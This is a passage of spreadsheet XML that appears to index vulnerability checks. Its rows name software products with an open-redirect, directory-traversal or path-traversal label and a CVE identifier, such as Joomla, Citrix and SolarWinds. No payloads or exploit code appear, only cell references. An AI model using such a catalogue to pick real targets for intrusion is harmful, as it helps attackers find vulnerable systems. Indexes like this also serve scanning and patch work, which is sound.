      <c r="C547" s="2"/>
      <c r="D547" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Otobo_开放重定向</v>
      </c>
      <c r="E547" s="6" t="s">
        <v>1850</v>
      </c>
      <c r="F547" s="4" t="s">
        <v>1851</v>
      </c>
    </row>
    <row r="548" s="4" customFormat="1" spans="1:6">
      <c r="A548" s="2" t="s">
        <v>1852</v>
      </c>
      <c r="B548" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C548" s="2"/>
      <c r="D548" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Thinkific_开放重定向</v>
      </c>
      <c r="E548" s="6" t="s">
        <v>1853</v>
      </c>
      <c r="F548" s="4" t="s">
        <v>1854</v>
      </c>
    </row>
    <row r="549" s="4" customFormat="1" spans="1:6">
      <c r="A549" s="2" t="s">
        <v>1855</v>
      </c>
      <c r="B549" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C549" s="2"/>
      <c r="D549" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Open Journal Systems pkp_开放重定向</v>
      </c>
      <c r="E549" s="6" t="s">
        <v>1856</v>
      </c>
      <c r="F549" s="4" t="s">
        <v>1857</v>
      </c>
    </row>
    <row r="550" s="4" customFormat="1" spans="1:6">
      <c r="A550" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B550" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C550" s="2"/>
      <c r="D550" s="2" t="str">
        <f t="shared" si="8"/>
        <v>WordPress_开放重定向</v>
      </c>
      <c r="E550" s="6" t="s">
        <v>1858</v>
      </c>
      <c r="F550" s="4" t="s">
        <v>1859</v>
      </c>
    </row>
    <row r="551" s="4" customFormat="1" spans="1:6">
      <c r="A551" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B551" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C551" s="2"/>
      <c r="D551" s="2" t="str">
        <f t="shared" si="8"/>
        <v>WordPress_开放重定向</v>
      </c>
      <c r="E551" s="6" t="s">
        <v>1860</v>
      </c>
      <c r="F551" s="4" t="s">
        <v>1861</v>
      </c>
    </row>
    <row r="552" s="4" customFormat="1" spans="1:6">
      <c r="A552" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B552" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C552" s="2"/>
      <c r="D552" s="2" t="str">
        <f t="shared" si="8"/>
        <v>WordPress_开放重定向</v>
      </c>
      <c r="E552" s="6" t="s">
        <v>1862</v>
      </c>
      <c r="F552" s="4" t="s">
        <v>1863</v>
      </c>
    </row>
    <row r="553" s="4" customFormat="1" spans="1:6">
      <c r="A553" s="2" t="s">
        <v>1864</v>
      </c>
      <c r="B553" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C553" s="2" t="s">
        <v>1866</v>
      </c>
      <c r="D553" s="2" t="str">
        <f t="shared" si="8"/>
        <v>WebGlimpse_目录遍历_CVE-2009-5114</v>
      </c>
      <c r="E553" s="6" t="s">
        <v>1867</v>
      </c>
      <c r="F553" s="4" t="s">
        <v>1868</v>
      </c>
    </row>
    <row r="554" s="4" customFormat="1" spans="1:6">
      <c r="A554" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B554" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C554" s="2" t="s">
        <v>1869</v>
      </c>
      <c r="D554" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Joomla_目录遍历_CVE-2010-2037</v>
      </c>
      <c r="E554" s="6" t="s">
        <v>1870</v>
      </c>
      <c r="F554" s="4" t="s">
        <v>1871</v>
      </c>
    </row>
    <row r="555" s="4" customFormat="1" spans="1:6">
      <c r="A555" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B555" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C555" s="2" t="s">
        <v>1872</v>
      </c>
      <c r="D555" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Joomla_目录遍历_CVE-2010-2036</v>
      </c>
      <c r="E555" s="6" t="s">
        <v>1873</v>
      </c>
      <c r="F555" s="4" t="s">
        <v>1874</v>
      </c>
    </row>
    <row r="556" s="4" customFormat="1" spans="1:6">
      <c r="A556" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B556" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C556" s="2" t="s">
        <v>1875</v>
      </c>
      <c r="D556" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Joomla_目录遍历_CVE-2010-2035</v>
      </c>
      <c r="E556" s="6" t="s">
        <v>1876</v>
      </c>
      <c r="F556" s="4" t="s">
        <v>1877</v>
      </c>
    </row>
    <row r="557" s="4" customFormat="1" spans="1:6">
      <c r="A557" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B557" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C557" s="2" t="s">
        <v>1878</v>
      </c>
      <c r="D557" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Joomla_目录遍历_CVE-2010-2034</v>
      </c>
      <c r="E557" s="6" t="s">
        <v>1879</v>
      </c>
      <c r="F557" s="4" t="s">
        <v>1880</v>
      </c>
    </row>
    <row r="558" s="4" customFormat="1" spans="1:6">
      <c r="A558" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B558" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C558" s="2" t="s">
        <v>1881</v>
      </c>
      <c r="D558" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Joomla_目录遍历_CVE-2010-1540</v>
      </c>
      <c r="E558" s="6" t="s">
        <v>1882</v>
      </c>
      <c r="F558" s="4" t="s">
        <v>1883</v>
      </c>
    </row>
    <row r="559" s="4" customFormat="1" spans="1:6">
      <c r="A559" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B559" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C559" s="2" t="s">
        <v>1884</v>
      </c>
      <c r="D559" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Joomla_目录遍历_CVE-2010-0943</v>
      </c>
      <c r="E559" s="6" t="s">
        <v>1885</v>
      </c>
      <c r="F559" s="4" t="s">
        <v>1886</v>
      </c>
    </row>
    <row r="560" s="4" customFormat="1" spans="1:6">
      <c r="A560" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B560" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C560" s="2" t="s">
        <v>1887</v>
      </c>
      <c r="D560" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Joomla_目录遍历_CVE-2010-0944</v>
      </c>
      <c r="E560" s="6" t="s">
        <v>1888</v>
      </c>
      <c r="F560" s="4" t="s">
        <v>1889</v>
      </c>
    </row>
    <row r="561" s="4" customFormat="1" spans="1:6">
      <c r="A561" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B561" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C561" s="2" t="s">
        <v>1890</v>
      </c>
      <c r="D561" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Joomla_目录遍历_CVE-2010-0942</v>
      </c>
      <c r="E561" s="6" t="s">
        <v>1891</v>
      </c>
      <c r="F561" s="4" t="s">
        <v>1892</v>
      </c>
    </row>
    <row r="562" s="4" customFormat="1" spans="1:6">
      <c r="A562" s="2" t="s">
        <v>1893</v>
      </c>
      <c r="B562" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C562" s="2" t="s">
        <v>1894</v>
      </c>
      <c r="D562" s="2" t="str">
        <f t="shared" si="8"/>
        <v>phpShowtime_目录遍历_CVE-2010-4282</v>
      </c>
      <c r="E562" s="6" t="s">
        <v>1895</v>
      </c>
      <c r="F562" s="4" t="s">
        <v>1896</v>
      </c>
    </row>
    <row r="563" s="4" customFormat="1" spans="1:6">
      <c r="A563" s="2" t="s">
        <v>721</v>
      </c>
      <c r="B563" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C563" s="2" t="s">
        <v>1897</v>
      </c>
      <c r="D563" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Cisco_目录遍历_CVE-2011-3315</v>
      </c>
      <c r="E563" s="6" t="s">
        <v>1898</v>
      </c>
      <c r="F563" s="4" t="s">
        <v>1899</v>
      </c>
    </row>
    <row r="564" s="4" customFormat="1" spans="1:6">
      <c r="A564" s="2" t="s">
        <v>1900</v>
      </c>
      <c r="B564" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C564" s="2" t="s">
        <v>1901</v>
      </c>
      <c r="D564" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Majordomo_目录遍历_CVE-2011-0049</v>
      </c>
      <c r="E564" s="6" t="s">
        <v>1902</v>
      </c>
      <c r="F564" s="4" t="s">
        <v>1903</v>
      </c>
    </row>
    <row r="565" s="4" customFormat="1" spans="1:6">
      <c r="A565" s="2" t="s">
        <v>1904</v>
      </c>
      <c r="B565" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C565" s="2" t="s">
        <v>1905</v>
      </c>
      <c r="D565" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Axigen Mail Server_目录遍历_CVE-2012-4940</v>
      </c>
      <c r="E565" s="6" t="s">
        <v>1906</v>
      </c>
      <c r="F565" s="4" t="s">
        <v>1907</v>
      </c>
    </row>
    <row r="566" s="4" customFormat="1" spans="1:6">
      <c r="A566" s="2" t="s">
        <v>1908</v>
      </c>
      <c r="B566" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C566" s="2" t="s">
        <v>1909</v>
      </c>
      <c r="D566" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Dolibarr ERP/CRM Alpha_目录遍历_CVE-2012-1226</v>
      </c>
      <c r="E566" s="6" t="s">
        <v>1910</v>
      </c>
      <c r="F566" s="4" t="s">
        <v>1911</v>
      </c>
    </row>
    <row r="567" s="4" customFormat="1" spans="1:6">
      <c r="A567" s="2" t="s">
        <v>1912</v>
      </c>
      <c r="B567" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C567" s="2" t="s">
        <v>1913</v>
      </c>
      <c r="D567" s="2" t="str">
        <f t="shared" si="8"/>
        <v>FlatnuXCMS_目录遍历_CVE-2012-4878</v>
      </c>
      <c r="E567" s="6" t="s">
        <v>1914</v>
      </c>
      <c r="F567" s="4" t="s">
        <v>1915</v>
      </c>
    </row>
    <row r="568" s="4" customFormat="1" spans="1:6">
      <c r="A568" s="2" t="s">
        <v>1916</v>
      </c>
      <c r="B568" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C568" s="2" t="s">
        <v>1917</v>
      </c>
      <c r="D568" s="2" t="str">
        <f t="shared" si="8"/>
        <v>MySQLDumper_目录遍历_CVE-2012-4253</v>
      </c>
      <c r="E568" s="6" t="s">
        <v>1918</v>
      </c>
      <c r="F568" s="4" t="s">
        <v>1919</v>
      </c>
    </row>
    <row r="569" s="4" customFormat="1" spans="1:6">
      <c r="A569" s="2" t="s">
        <v>1893</v>
      </c>
      <c r="B569" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C569" s="2" t="s">
        <v>1920</v>
      </c>
      <c r="D569" s="2" t="str">
        <f t="shared" si="8"/>
        <v>phpShowtime_目录遍历_CVE-2012-0981</v>
      </c>
      <c r="E569" s="6" t="s">
        <v>1921</v>
      </c>
      <c r="F569" s="4" t="s">
        <v>1922</v>
      </c>
    </row>
    <row r="570" s="4" customFormat="1" spans="1:6">
      <c r="A570" s="2" t="s">
        <v>721</v>
      </c>
      <c r="B570" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C570" s="2" t="s">
        <v>1923</v>
      </c>
      <c r="D570" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Cisco_目录遍历_CVE-2013-5528</v>
      </c>
      <c r="E570" s="6" t="s">
        <v>1924</v>
      </c>
      <c r="F570" s="4" t="s">
        <v>1925</v>
      </c>
    </row>
    <row r="571" s="4" customFormat="1" spans="1:6">
      <c r="A571" s="2" t="s">
        <v>1926</v>
      </c>
      <c r="B571" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C571" s="2" t="s">
        <v>1927</v>
      </c>
      <c r="D571" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Xibo_目录遍历_CVE-2013-5979</v>
      </c>
      <c r="E571" s="6" t="s">
        <v>1928</v>
      </c>
      <c r="F571" s="4" t="s">
        <v>1929</v>
      </c>
    </row>
    <row r="572" s="4" customFormat="1" spans="1:6">
      <c r="A572" s="2" t="s">
        <v>1930</v>
      </c>
      <c r="B572" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C572" s="2" t="s">
        <v>1931</v>
      </c>
      <c r="D572" s="2" t="str">
        <f t="shared" si="8"/>
        <v>DomPHP_目录遍历_CVE-2014-10037</v>
      </c>
      <c r="E572" s="6" t="s">
        <v>1932</v>
      </c>
      <c r="F572" s="4" t="s">
        <v>1933</v>
      </c>
    </row>
    <row r="573" s="4" customFormat="1" spans="1:6">
      <c r="A573" s="2" t="s">
        <v>1838</v>
      </c>
      <c r="B573" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C573" s="2" t="s">
        <v>1934</v>
      </c>
      <c r="D573" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Netsweeper_目录遍历_CVE-2014-9609</v>
      </c>
      <c r="E573" s="6" t="s">
        <v>1935</v>
      </c>
      <c r="F573" s="4" t="s">
        <v>1936</v>
      </c>
    </row>
    <row r="574" s="4" customFormat="1" spans="1:6">
      <c r="A574" s="2" t="s">
        <v>1937</v>
      </c>
      <c r="B574" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C574" s="2" t="s">
        <v>1938</v>
      </c>
      <c r="D574" s="2" t="str">
        <f t="shared" si="8"/>
        <v>webEdition_目录遍历_CVE-2014-5258</v>
      </c>
      <c r="E574" s="6" t="s">
        <v>1939</v>
      </c>
      <c r="F574" s="4" t="s">
        <v>1940</v>
      </c>
    </row>
    <row r="575" s="4" customFormat="1" spans="1:6">
      <c r="A575" s="2" t="s">
        <v>283</v>
      </c>
      <c r="B575" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C575" s="2" t="s">
        <v>1941</v>
      </c>
      <c r="D575" s="2" t="str">
        <f t="shared" si="8"/>
        <v>IceWarp_目录遍历_CVE-2015-1503</v>
      </c>
      <c r="E575" s="6" t="s">
        <v>1942</v>
      </c>
      <c r="F575" s="4" t="s">
        <v>1943</v>
      </c>
    </row>
    <row r="576" s="4" customFormat="1" spans="1:6">
      <c r="A576" s="2" t="s">
        <v>1944</v>
      </c>
      <c r="B576" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C576" s="2" t="s">
        <v>1945</v>
      </c>
      <c r="D576" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Koha_目录遍历_CVE-2015-4632</v>
      </c>
      <c r="E576" s="6" t="s">
        <v>1946</v>
      </c>
      <c r="F576" s="4" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="577" s="4" customFormat="1" spans="1:6">
      <c r="A577" s="2" t="s">
        <v>58</v>
      </c>
      <c r="B577" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C577" s="2" t="s">
        <v>1948</v>
      </c>
      <c r="D577" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Magento_目录遍历_CVE-2015-2067</v>
      </c>
      <c r="E577" s="6" t="s">
        <v>1949</v>
      </c>
      <c r="F577" s="4" t="s">
        <v>1950</v>
      </c>
    </row>
    <row r="578" s="4" customFormat="1" spans="1:6">
      <c r="A578" s="2" t="s">
        <v>1951</v>
      </c>
      <c r="B578" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C578" s="2" t="s">
        <v>1952</v>
      </c>
      <c r="D578" s="2" t="str">
        <f t="shared" ref="D578:D641" si="9">_xlfn.TEXTJOIN("_",TRUE,A578:C578)</f>
        <v>Eaton Intelligent Power Manager_目录遍历_CVE-2018-12031</v>
      </c>
      <c r="E578" s="6" t="s">
        <v>1953</v>
      </c>
      <c r="F578" s="4" t="s">
        <v>1954</v>
      </c>
    </row>
    <row r="579" s="4" customFormat="1" spans="1:6">
      <c r="A579" s="2" t="s">
        <v>1955</v>
      </c>
      <c r="B579" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C579" s="2" t="s">
        <v>1956</v>
      </c>
      <c r="D579" s="2" t="str">
        <f t="shared" si="9"/>
        <v>NCBI ToolBox_目录遍历_CVE-2018-16716</v>
      </c>
      <c r="E579" s="6" t="s">
        <v>1957</v>
      </c>
      <c r="F579" s="4" t="s">
        <v>1958</v>
      </c>
    </row>
    <row r="580" s="4" customFormat="1" spans="1:6">
      <c r="A580" s="2" t="s">
        <v>1959</v>
      </c>
      <c r="B580" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C580" s="2" t="s">
        <v>1960</v>
      </c>
      <c r="D580" s="2" t="str">
        <f t="shared" si="9"/>
        <v>RubedoCMS_目录遍历_CVE-2018-16836</v>
      </c>
      <c r="E580" s="6" t="s">
        <v>1961</v>
      </c>
      <c r="F580" s="4" t="s">
        <v>1962</v>
      </c>
    </row>
    <row r="581" s="4" customFormat="1" spans="1:6">
      <c r="A581" s="2" t="s">
        <v>1963</v>
      </c>
      <c r="B581" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C581" s="2" t="s">
        <v>1964</v>
      </c>
      <c r="D581" s="2" t="str">
        <f t="shared" si="9"/>
        <v>TIBCO JasperReports Library_目录遍历_CVE-2018-18809</v>
      </c>
      <c r="E581" s="6" t="s">
        <v>1965</v>
      </c>
      <c r="F581" s="4" t="s">
        <v>1966</v>
      </c>
    </row>
    <row r="582" s="4" customFormat="1" spans="1:6">
      <c r="A582" s="2" t="s">
        <v>1967</v>
      </c>
      <c r="B582" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C582" s="2" t="s">
        <v>1968</v>
      </c>
      <c r="D582" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Wowza Streaming Engine Manager_目录遍历_CVE-2018-19365</v>
      </c>
      <c r="E582" s="6" t="s">
        <v>1969</v>
      </c>
      <c r="F582" s="4" t="s">
        <v>1970</v>
      </c>
    </row>
    <row r="583" s="4" customFormat="1" spans="1:6">
      <c r="A583" s="2" t="s">
        <v>1227</v>
      </c>
      <c r="B583" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C583" s="2" t="s">
        <v>1971</v>
      </c>
      <c r="D583" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Citrix_目录遍历_CVE-2019-19781</v>
      </c>
      <c r="E583" s="6" t="s">
        <v>1972</v>
      </c>
      <c r="F583" s="4" t="s">
        <v>1973</v>
      </c>
    </row>
    <row r="584" s="4" customFormat="1" spans="1:6">
      <c r="A584" s="2" t="s">
        <v>1974</v>
      </c>
      <c r="B584" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C584" s="2" t="s">
        <v>1975</v>
      </c>
      <c r="D584" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Cartadis Gespage_目录遍历_CVE-2021-33807</v>
      </c>
      <c r="E584" s="6" t="s">
        <v>1976</v>
      </c>
      <c r="F584" s="4" t="s">
        <v>1977</v>
      </c>
    </row>
    <row r="585" s="4" customFormat="1" spans="1:6">
      <c r="A585" s="2" t="s">
        <v>1978</v>
      </c>
      <c r="B585" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C585" s="2" t="s">
        <v>1979</v>
      </c>
      <c r="D585" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Galera WebTemplate Directory Traversal_目录遍历_CVE-2021-40960</v>
      </c>
      <c r="E585" s="6" t="s">
        <v>1980</v>
      </c>
      <c r="F585" s="4" t="s">
        <v>1981</v>
      </c>
    </row>
    <row r="586" s="4" customFormat="1" spans="1:6">
      <c r="A586" s="2" t="s">
        <v>1982</v>
      </c>
      <c r="B586" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C586" s="2" t="s">
        <v>1983</v>
      </c>
      <c r="D586" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Payara Micro Community Directory Traversal_目录遍历_CVE-2021-41381</v>
      </c>
      <c r="E586" s="6" t="s">
        <v>1984</v>
      </c>
      <c r="F586" s="4" t="s">
        <v>1985</v>
      </c>
    </row>
    <row r="587" s="4" customFormat="1" spans="1:6">
      <c r="A587" s="2" t="s">
        <v>528</v>
      </c>
      <c r="B587" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C587" s="2" t="s">
        <v>1986</v>
      </c>
      <c r="D587" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Spring_目录遍历_CVE-2021-21234</v>
      </c>
      <c r="E587" s="6" t="s">
        <v>1987</v>
      </c>
      <c r="F587" s="4" t="s">
        <v>1988</v>
      </c>
    </row>
    <row r="588" s="4" customFormat="1" spans="1:6">
      <c r="A588" s="2" t="s">
        <v>1989</v>
      </c>
      <c r="B588" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C588" s="2" t="s">
        <v>1990</v>
      </c>
      <c r="D588" s="2" t="str">
        <f t="shared" si="9"/>
        <v>ffay lanproxy_目录遍历_CVE-2021-3019</v>
      </c>
      <c r="E588" s="6" t="s">
        <v>1991</v>
      </c>
      <c r="F588" s="4" t="s">
        <v>1992</v>
      </c>
    </row>
    <row r="589" s="4" customFormat="1" spans="1:6">
      <c r="A589" s="2" t="s">
        <v>1993</v>
      </c>
      <c r="B589" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C589" s="2" t="s">
        <v>1994</v>
      </c>
      <c r="D589" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Copyparty_目录遍历_CVE-2023-37474</v>
      </c>
      <c r="E589" s="6" t="s">
        <v>1995</v>
      </c>
      <c r="F589" s="4" t="s">
        <v>1996</v>
      </c>
    </row>
    <row r="590" s="4" customFormat="1" spans="1:6">
      <c r="A590" s="2" t="s">
        <v>1997</v>
      </c>
      <c r="B590" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C590" s="2" t="s">
        <v>1998</v>
      </c>
      <c r="D590" s="2" t="str">
        <f t="shared" si="9"/>
        <v>FileMage Gateway_目录遍历_CVE-2023-39026</v>
      </c>
      <c r="E590" s="6" t="s">
        <v>1999</v>
      </c>
      <c r="F590" s="4" t="s">
        <v>2000</v>
      </c>
    </row>
    <row r="591" s="4" customFormat="1" spans="1:6">
      <c r="A591" s="2" t="s">
        <v>2001</v>
      </c>
      <c r="B591" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C591" s="2" t="s">
        <v>2002</v>
      </c>
      <c r="D591" s="2" t="str">
        <f t="shared" si="9"/>
        <v>FortiWLM_目录遍历_CVE-2023-34990</v>
      </c>
      <c r="E591" s="6" t="s">
        <v>2003</v>
      </c>
      <c r="F591" s="4" t="s">
        <v>2004</v>
      </c>
    </row>
    <row r="592" s="4" customFormat="1" spans="1:6">
      <c r="A592" s="2" t="s">
        <v>2005</v>
      </c>
      <c r="B592" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C592" s="2" t="s">
        <v>2006</v>
      </c>
      <c r="D592" s="2" t="str">
        <f t="shared" si="9"/>
        <v>JFinalCMS_目录遍历_CVE-2023-41599</v>
      </c>
      <c r="E592" s="6" t="s">
        <v>2007</v>
      </c>
      <c r="F592" s="4" t="s">
        <v>2008</v>
      </c>
    </row>
    <row r="593" s="4" customFormat="1" spans="1:6">
      <c r="A593" s="2" t="s">
        <v>2009</v>
      </c>
      <c r="B593" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C593" s="2" t="s">
        <v>2010</v>
      </c>
      <c r="D593" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Nodogsplash_目录遍历_CVE-2023-39120</v>
      </c>
      <c r="E593" s="6" t="s">
        <v>2011</v>
      </c>
      <c r="F593" s="4" t="s">
        <v>2012</v>
      </c>
    </row>
    <row r="594" s="4" customFormat="1" spans="1:6">
      <c r="A594" s="2" t="s">
        <v>104</v>
      </c>
      <c r="B594" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C594" s="2" t="s">
        <v>2013</v>
      </c>
      <c r="D594" s="2" t="str">
        <f t="shared" si="9"/>
        <v>PrestaShop_目录遍历_CVE-2023-27640</v>
      </c>
      <c r="E594" s="6" t="s">
        <v>2014</v>
      </c>
      <c r="F594" s="4" t="s">
        <v>2015</v>
      </c>
    </row>
    <row r="595" s="4" customFormat="1" spans="1:6">
      <c r="A595" s="2" t="s">
        <v>2016</v>
      </c>
      <c r="B595" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C595" s="2" t="s">
        <v>2017</v>
      </c>
      <c r="D595" s="2" t="str">
        <f t="shared" si="9"/>
        <v>SolarWinds Serv_目录遍历_CVE-2024-28995</v>
      </c>
      <c r="E595" s="6" t="s">
        <v>2018</v>
      </c>
      <c r="F595" s="4" t="s">
        <v>2019</v>
      </c>
    </row>
    <row r="596" s="4" customFormat="1" spans="1:6">
      <c r="A596" s="2" t="s">
        <v>2020</v>
      </c>
      <c r="B596" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C596" s="2" t="s">
        <v>2021</v>
      </c>
      <c r="D596" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Personal Weather Station Dashboard_目录遍历_CVE-2025-47423</v>
      </c>
      <c r="E596" s="6" t="s">
        <v>2022</v>
      </c>
      <c r="F596" s="4" t="s">
        <v>2023</v>
      </c>
    </row>
    <row r="597" s="4" customFormat="1" spans="1:6">
      <c r="A597" s="2" t="s">
        <v>2024</v>
      </c>
      <c r="B597" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C597" s="2" t="s">
        <v>2025</v>
      </c>
      <c r="D597" s="2" t="str">
        <f t="shared" si="9"/>
        <v>mojoPortal_目录遍历_CVE-2025-28367</v>
      </c>
      <c r="E597" s="6" t="s">
        <v>2026</v>
      </c>
      <c r="F597" s="4" t="s">
        <v>2027</v>
      </c>
    </row>
    <row r="598" s="4" customFormat="1" spans="1:6">
      <c r="A598" s="2" t="s">
        <v>2028</v>
      </c>
      <c r="B598" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C598" s="2"/>
      <c r="D598" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Voyager_目录遍历</v>
      </c>
      <c r="E598" s="6" t="s">
        <v>2029</v>
      </c>
      <c r="F598" s="4" t="s">
        <v>2030</v>
      </c>
    </row>
    <row r="599" s="4" customFormat="1" spans="1:6">
      <c r="A599" s="2" t="s">
        <v>2031</v>
      </c>
      <c r="B599" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C599" s="2" t="s">
        <v>2033</v>
      </c>
      <c r="D599" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Belkin N Router_路径遍历_CVE-2014-2962</v>
      </c>
      <c r="E599" s="6" t="s">
        <v>2034</v>
      </c>
      <c r="F599" s="4" t="s">
        <v>2035</v>
      </c>
    </row>
    <row r="600" s="4" customFormat="1" spans="1:6">
      <c r="A600" s="2" t="s">
        <v>2036</v>
      </c>
      <c r="B600" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C600" s="2" t="s">
        <v>2037</v>
      </c>
      <c r="D600" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Oracle Business Intelligence_路径遍历_CVE-2019-2588</v>
      </c>
      <c r="E600" s="6" t="s">
        <v>2038</v>
      </c>
      <c r="F600" s="4" t="s">
        <v>2039</v>
      </c>
    </row>
    <row r="601" s="4" customFormat="1" spans="1:6">
      <c r="A601" s="2" t="s">
        <v>2040</v>
      </c>
      <c r="B601" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C601" s="2" t="s">
        <v>2041</v>
      </c>
      <c r="D601" s="2" t="str">
        <f t="shared" si="9"/>
        <v>GLPI plugin Barcode_路径遍历_CVE-2021-43778</v>
      </c>
      <c r="E601" s="6" t="s">
        <v>2042</v>
      </c>
      <c r="F601" s="4" t="s">
        <v>2043</v>
      </c>
    </row>
    <row r="602" s="4" customFormat="1" spans="1:6">
      <c r="A602" s="2" t="s">
        <v>2044</v>
      </c>
      <c r="B602" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C602" s="2" t="s">
        <v>2045</v>
      </c>
      <c r="D602" s="2" t="str">
        <f t="shared" si="9"/>
        <v>GhostCMS_路径遍历_CVE-2023-32235</v>
      </c>
      <c r="E602" s="6" t="s">
        <v>2046</v>
      </c>
      <c r="F602" s="4" t="s">
        <v>2047</v>
      </c>
    </row>
    <row r="603" s="4" customFormat="1" spans="1:6">
      <c r="A603" s="2" t="s">
        <v>2048</v>
      </c>
      <c r="B603" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C603" s="2" t="s">
        <v>2049</v>
      </c>
      <c r="D603" s="2" t="str">
        <f t="shared" si="9"/>
        <v>MLflow _路径遍历_CVE-2023-3765</v>
      </c>
      <c r="E603" s="6" t="s">
        <v>2050</v>
      </c>
      <c r="F603" s="4" t="s">
        <v>2051</v>
      </c>
    </row>
    <row r="604" s="4" customFormat="1" spans="1:6">
      <c r="A604" s="2" t="s">
        <v>2052</v>
      </c>
      <c r="B604" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C604" s="2" t="s">
        <v>2053</v>
      </c>
      <c r="D604" s="2" t="str">
        <f t="shared" si="9"/>
        <v>PaperCut_路径遍历_CVE-2023-39143</v>
      </c>
      <c r="E604" s="6" t="s">
        <v>2054</v>
      </c>
      <c r="F604" s="4" t="s">
        <v>2055</v>
      </c>
    </row>
    <row r="605" s="4" customFormat="1" spans="1:6">
      <c r="A605" s="2" t="s">
        <v>2056</v>
      </c>
      <c r="B605" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C605" s="2" t="s">
        <v>2057</v>
      </c>
      <c r="D605" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Qlik Sense Enterprise_路径遍历_CVE-2023-41266</v>
      </c>
      <c r="E605" s="6" t="s">
        <v>2058</v>
      </c>
      <c r="F605" s="4" t="s">
